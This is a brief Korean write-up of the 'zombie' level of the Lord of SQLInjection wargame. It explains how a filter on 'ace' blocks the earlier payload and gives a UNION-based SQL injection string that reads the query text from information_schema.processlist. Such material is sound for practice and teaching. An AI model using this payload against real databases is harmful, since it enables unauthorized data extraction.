[WriteUp]/[Lord Of SQLInjection] zombie

zombie

- 필터링 부분을 보면 ace를 필터링 한다.

- replace를 필터링 하겠다는 의미

-> 이전 문제에서 사용했던 페이로드를 사용 불가함

- informaton_schema DB에 processlist라는 테이블이 존재함

-> 해당 테이블의 INFO 칼럼에 이전에 실행했던 쿼리문이 저장되어 있음

[도메인 값]?pw=' union select substr(info, 38, 72) from information_schema.processlist%23